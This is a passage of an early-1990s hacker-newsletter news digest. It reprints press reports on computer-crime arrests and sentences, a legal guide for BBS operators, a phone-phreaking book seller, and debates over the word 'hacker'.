  6947. 2.  COMPUTER ACCESS ARRESTS IN NEW YORK (Barbara E. McMullen & John F.
  6948.     McMullen, Newsbytes, 11/3/92) -- GREENBURGH, NEW YORK -- The Greenburgh,
  6949.     New York Police Department has announced the arrest of three individuals,
  6950.     Randy P. Sigman, 40; Ronald G. Pinz, Jr, 21; and Byron J. Woodard, 18 for
  6951.     the alleged crimes of Unauthorized Use Of A Computer and Attempted Computer
  6952.     Trespass, both misdemeanors.  Also arrested was Jason A. Brittain, 22 in
  6953.     satisfaction of a State of Arizona Fugitive From Justice warrant.
  6954.  
  6955.     The arrests took place in the midst of an "OctoberCon" or "PumpCon" party
  6956.     billed as a "hacker get-together" at the Marriott Courtyard Hotel in
  6957.     Greenburgh.  The arrests were made at approximately 4:00 AM on Sunday
  6958.     morning, November 1st.  The three defendants arrested for computer crimes
  6959.     were granted $1,000 bail and will be arraigned on Friday, November 6th.
  6960.  
  6961.     Newsbytes sources said that the get together, which had attracted up to
  6962.     sixty people, had dwindled to approximately twenty-five when, at 10:00
  6963.     Saturday night, the police, in response to noise complaints arrived and
  6964.     allegedly found computers in use accessing systems over telephone lines.
  6965.     The police held the twenty-five for questioning and called in Westchester
  6966.     County Assistant District Attorney Kenneth Citarella, a prosecutor versed
  6967.     in computer crime, for assistance. During the questioning period, the
  6968.     information on Brittain as a fugitive from Arizona was obtained and at 4:00
  6969.     the three alleged criminal trespassers and Brittain were charged.
  6970.  
  6971.     Both Lt. DeCarlo of the Greenburgh police and Citarella told Newsbytes
  6972.     that the investigation is continuing and that no further information is
  6973.     available at this time.
  6974.  
  6975. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6976.  
  6977. 3.  U.S. PRISON SENTENCE FOR COMPUTER HACKER (New York Law Journal, 10/15/92,
  6978.     Page 7) -- A Brooklyn man was sentenced yesterday to eight months in prison
  6979.     for buying passwords from a computer hacker group known as the "masters of
  6980.     deception" [MOD] for resale to others seeking access to confidential credit
  6981.     reports.
  6982.  
  6983.     Morton Rosenfeld, 21, received the sentence in federal court in Manhattan
  6984.     after pleading guilty in June to obtaining the unauthorized access devices
  6985.     to computer data bases operated by TRW Information Services and other
  6986.     credit reporting companies.
  6987.  
  6988.     The sentence, imposed by Southern District Judge Shirley Wohl Kram, is
  6989.     believed to be among few prison terms levied for computer-related offenses.
  6990.  
  6991.     Meanwhile, charges are pending against Mr. Rosenfeld's alleged source: the
  6992.     five members of the masters of deception, young men in their teens and
  6993.     20's.  The five were accused in July of breaking into computer systems run
  6994.     by credit reporting services, telephone companies and educational
  6995.     institutions.
  6996.  
  6997.     For more information about the indictment and case against MOD, see ALL the
  6998.     articles in PWN 40-2.
  6999.  
  7000. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7001.  
  7002. 4.  2ND ONLINE LEGAL GUIDE RELEASED (by Barbara E. McMullen & John F. McMullen,
  7003.     Newsbytes, 10/13/92) -- NEW YORK CITY -- PC Information Group has announced
  7004.     the release of SysLaw, Second Edition: The Legal Guide for Online Service
  7005.     Providers by attorneys Lance Rose and Jonathan Wallace.
  7006.  
  7007.     According to the company, "Syslaw provides BBS sysops, network moderators
  7008.     and other online service providers with basic information on their rights
  7009.     and responsibilities, in a form that non-lawyers can easily understand."
  7010.  
  7011.     Subjects covered by the book include the First Amendment, copyrights and
  7012.     trademarks, the user agreement, negligence, privacy, criminal law, searches
  7013.     and seizures, viruses and adult materials.  The company claims that SysLaw
  7014.     not only explains the laws, but that it gives detailed advice enabling
  7015.     system operators to create the desired balance of user services, freedom,
  7016.     and protection from risk on their systems."
  7017.  
  7018.     Co-author Lance Rose told Newsbytes: "In the four years since the
  7019.     publication of the first edition, the electronic community has become
  7020.     alerted to the first amendment dimensions of the on-line community."
  7021.  
  7022.     "The first amendment has profound implications to the on-line community
  7023.     both to liberate providers and users of on-line systems and to protect them
  7024.     from undue legal harassment.  There has, in the last few years, been a lot
  7025.     of law enforcement activity effecting bulletin board systems, including the
  7026.     Steve Jackson and Craig Neidorf/Phrack cases," he said.
  7027.  
  7028.     Rose continued, "The new edition incorporates these new developments as
  7029.     well as containing new information concerning on-line property rights, user
  7030.     agreements, sysop liabilities, viruses and adult material contained on
  7031.     online systems."
  7032.  
  7033.     SysLaw is available from PC Information Group, 1126 East Broadway, Winona,
  7034.     MN  55987 (800-321-8285 or 507-452-2824) at a price of $34.95 plus $3.00
  7035.     shipping and (if applicable) sales tax.
  7036.  
  7037.     Press Contact:  Brian Blackledge, PC Information Group, 800-321-8285
  7038.  
  7039. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7040.  
  7041. 5.  YET ANOTHER BOOK ABOUT THE COMPUTER UNDERGROUND (The Daily Telegraph,
  7042.     12/14/92, Page 25) -- Approaching Zero: Data Crime and the Computer
  7043.     Underworld by Bryan Clough and Paul Mungo (Faber & Faber, L14.99) -- A look
  7044.     at the world of Fry Guy, Control C, Captain Zap and other hackers to blame
  7045.     for the viruses, logic bombs and Trojan horses in the world's personal
  7046.     computer networks.
  7047.  
  7048. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7049.  
  7050. 6.  HONOR STUDENT NABBED IN COMPUTER FRAUD (The Washington Times, 11/9/92, Page
  7051.     A6) -- BROOKSVILLE, FLA.-- Three high school honor students have been
  7052.     accused of stealing tens of thousands of dollars worth of long-distance
  7053.     calls as computer hackers.
  7054.  
  7055.     Brian McGrogan, 16, and Edmund Padgett, 17, who were charged as adults, and
  7056.     a 15-year-old allegedly tapped private telephone systems and dialed into an
  7057.     international hacking network.  One company's loss was $36,000.
  7058.  
  7059.     "These are very sharp, intelligent kids," Hernando County sheriff's Captain
  7060.     Richard Nugent said after the arrests.  "It's a game to them.  It's a
  7061.     sport."
  7062.  
  7063.     Some calls were made to computer bulletin boards in the United Kingdom,
  7064.     Germany and Canada, where a loose network of hackers allegedly shared
  7065.     information about how to obtain computer data and access information.
  7066.     Arrests in the case also were made in New York and Virginia, Captain Nugent
  7067.     said.
  7068.  
  7069.     The two older boys were booked on charges of organized fraud and violation
  7070.     of intellectual property.  The third boy was released to his parents.
  7071.  
  7072. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7073.  
  7074. 7.  A CORDLESS PHONE THAT CAN THWART EAVESDROPPERS (Business Week, 8/3/92) --
  7075.     To industrial spies and other snoops, the millions of cordless phones in
  7076.     use are goldmines of information.  Conversations can be plucked out of the
  7077.     air by means of a police type scanner, and with increasing ease.  The
  7078.     latest no-cord technologies offers clearer sound and longer ranges -- up to
  7079.     half a mile.  That's because the new phones broadcast signals at 900 MHz,
  7080.     or 20 times the frequency of current models.
  7081.  
  7082.     Cincinnati Microwave, Inc. (the radar detector people) figures executives
  7083.     and consumers will pay a small premium for cordless privacy.  The company
  7084.     has developed a phone, to be marketed in October by its Escort division for
  7085.     about $300, that thwarts eavesdroppers with "spread spectrum" technology,
  7086.     which is similar to the encryption method that the military uses in secure
  7087.     radios.  The signals between the handset and base unit are digitized,
  7088.     making them unintelligible to humans, and the transmission randomly hops
  7089.     among various frequencies within the 900 MHz spectrum.  To keep the cost
  7090.     down to the range of other 900 MHz models, Cincinnati Microwave has
  7091.     developed special microchips that keep the handset and base in sync.
  7092.  
  7093. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7094.  
  7095. 8.  NEW AREA CODE -- As of November 1, 1992, a new 210 area code is serving 152
  7096.     communities in the San Antonio and Rio Grande Valley areas.
  7097.  
  7098. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7099.  
  7100. 9.  FOR SALE: PHONE-PHREAKING TOOLS (Brigid McMenamin, Forbes, 8/3/92, Page 64)
  7101.     -- From his remote outpost in Alamogordo, New Mexico, John Williams makes a
  7102.     nice living telling hackers how to rip off phone and computer systems.
  7103.  
  7104.     Williams says he brings in about $200,000 a year publishing books on
  7105.     everything from credit card scams and cracking automated teller machines to
  7106.     electronic shoplifting, cellular phone phreaking and voice mailbox hacking,
  7107.     each costing $29 to $39, and each complete with precise instructions.  He
  7108.     even sells Robofones, which save hackers from doing a lot of dialing while
  7109.     they steal access codes.
  7110.  
  7111.     Isn't what he does illegal?  Perhaps it should be, but it isn't.  Wrapping
  7112.     himself in the First Amendment, Williams is a member in good standing of
  7113.     the Alamogordo Chamber of Commerce and the New Mexico Better Business
  7114.     Bureau.  He thumbs his nose at companies and authorities that would like to
  7115.     make him stop selling such secrets.  "We don't promote fraud," he insists.
  7116.     "It's all sold for educational purposes only.  If we didn't publish the
  7117.     information, it would still be out there."
  7118.  
  7119.     But last year Williams got a visit form the Secret Service, which was
  7120.     following up on a telephone fraud case in which one of his publications
  7121.     figured prominently.
  7122.  
  7123.     In Gainsville, Florida, in November 1990, two young men were locked up by
  7124.     police for hacking into voice-mail systems and then making calls to 900
  7125.     numbers.  One of the pair, known as the Shark, then 20, confessed to the
  7126.     crime, but said he was on assignment for Williams' Consumertronics
  7127.     publication.  The culprits could have been given five years on the fraud
  7128.     charge alone.  But the victim didn't want any publicity, so the state let
  7129.     them do 50 hours of community service instead.
  7130.  
  7131.     The Secret Service went to talk to Williams.  Williams assured agent James
  7132.     Pollard that he'd never told the Shark to do anything illegal.
  7133.     Nevertheless, says Williams, the agent implied that Williams and members of
  7134.     his family who work for him might be prosecuted for publishing voice-mail
  7135.     access codes.
  7136.  
  7137.     In the end, no charges were filed against Williams, who admits he has a
  7138.     thing against big business, especially the phone companies.  "For decades,
  7139.     they financed right-wing regimes in Latin America," he rants.
  7140.  
  7141.     It's a crazy world, that of the telephone toll fraudsters.
  7142.  
  7143. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7144.  
  7145. 10. NEW YORK STATE POLICE DECRIMINALIZE THE WORD "HACKER" (Barbara E. McMullen
  7146.     & John F. McMullen, Newsbytes, 10/21/92) -- ALBANY, NEW YORK -- Senior
  7147.     investigator Ron Stevens of the New York State Police Computer Unit has
  7148.     told Newsbytes that it will be the practice of his unit to avoid the use of
  7149.     the term "hacker" in describing those alleged to have committed computer
  7150.     crimes.
  7151.  
  7152.     Stevens told Newsbytes, "We use the term computer criminal to describe
  7153.     those who break the law using computers.  While the lay person may have
  7154.     come to understand the meaning of hacker as a computer criminal, the term
  7155.     isn't accurate.  The people in the early days of the computer industry
  7156.     considered themselves hackers and they made the computer what it is today.
  7157.     There are those today who consider themselves hackers and do not commit
  7158.     illegal acts."
  7159.  
  7160.     Stevens had made similar comments in a recent conversation with Albany BBS
  7161.     operator Marty Winter.  Winter told Newsbytes, "'Hacker' is, unfortunately
  7162.     an example of the media taking what used to be an honorable term, and using
  7163.     it to describe an activity because they (the media) are too lazy or stupid
  7164.     to come up with something else.  Who knows, maybe one day 'computer
  7165.     delinquent' WILL be used, but I sure ain't gonna hold my breath."
  7166.  
  7167.     Stevens, together with investigator Dick Lynch and senior investigator
  7168.     Donald Delaney, attended the March 1992 Computers, Freedom and Privacy
  7169.     Conference (CFP-2) in Washington, DC and met such industry figures as Glenn
  7170.     Tenney, congressional candidate and chairman of the WELL's annual "Hacker
  7171.     Conference"; Craig Neidorf, founding editor and publisher of Phrack; Steven
  7172.     Levy, author of "Hackers" and the recently published "Artificial Life";
  7173.     Bruce Sterling, author of the recently published "The Hacker Crackdown";
  7174.     Emmanuel Goldstein, editor and publisher of 2600: The Hacker Quarterly" and
  7175.     a number of well-known "hackers."
  7176.  
  7177.     Stevens said, "When I came home, I read as much of the literature about the
  7178.     subject that I could and came to the conclusion that a hacker is not
  7179.     necessarily a computer criminal."
  7180.  
  7181.     The use of the term "hacker" to describe those alleged to have committed
  7182.     computer crimes has long been an irritant to many in the online community.
  7183.     When the July 8th federal indictment of 5 New York City individuals
  7184.     contained the definition of computer hacker as "someone who uses a computer
  7185.     or a telephone to obtain unauthorized access to other computers," there was
  7186.     an outcry on such electronic conferencing system as the WELL (Whole Earth
  7187.     'Lectronic Link).  Many of the same people reacted quite favorably to the
  7188.     Stevens statement when it was posted on the WELL.
  7189.  
  7190. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7191. 11.  STEVE JACKSON GAMES TRIAL DATE SET -- Mike Godwin, General Counsel for the
  7192.      Electronic Frontier Foundation, announced on December 23rd that the case
  7193.      of Steve Jackson Games, et.al. v. The United States Secret Service et. al.
  7194.      will go to trial in Austin, Texas on Tuesday, January 19, 1993.
  7195. _______________________________________________________________________________
  7196.